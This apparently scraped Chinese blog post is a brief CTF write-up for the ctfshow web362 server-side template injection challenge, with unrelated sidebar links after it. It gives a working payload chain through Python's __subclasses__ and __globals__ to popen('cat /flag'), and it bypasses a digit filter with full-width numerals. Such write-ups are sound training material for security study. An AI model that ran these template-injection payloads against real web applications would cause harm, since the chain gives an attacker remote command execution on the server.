当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Promote QT default control to custom control
- 硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
- Implement a simple function to calculate the sum of all integers between M ~ n (m < n)
- QT curve / oscilloscope customplot control
- Domestic GD chip can filter
- kettle庖丁解牛第17篇之文本文件输出
- Linux installs MySQL in RPM (super simple)
- QT error: no matching member function for call to ‘connect‘
- 【ACM】455. Distribute Biscuits (1. Give priority to big biscuits to big appetite; 2. Traverse two arrays with only one for loop (use subscript index -- to traverse another array))
- Matlab tips (6) comparison of seven filtering methods
猜你喜欢
QT tablewidget insert qcombobox drop-down box
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
Multifunctional toolbox wechat applet source code
Docker installation MySQL
【ACM】376. 摆动序列
Introduction to quantexa CDI syneo platform
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
纠结
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
Imx6 debugging LVDS screen technical notes
随机推荐
JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞
C language to achieve 2048 small game direction merging logic
22年字节跳动飞书人力套件三面面经
QT curve / oscilloscope customplot control
Can filter
Connection mode of QT signal and slot connect() and the return value of emit
Setting up keil environment of GD single chip microcomputer
From source code to executable file
Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
【ACM】376. 摆动序列
Nodejs installation
Const keyword, variable and function are decorated with const
Using transmittablethreadlocal to realize parameter cross thread transmission
Jeecg boot microservice architecture
Pointers in rust: box, RC, cell, refcell
Quantexa CDI(场景决策智能)Syneo平台介绍
Implement a simple function to calculate the sum of all integers between M ~ n (m < n)
Daily CISSP certification common mistakes (April 13, 2022)
Log4j2 cross thread print traceid
C language simulates entering and leaving the stack, first in first out, first in first out, shared memory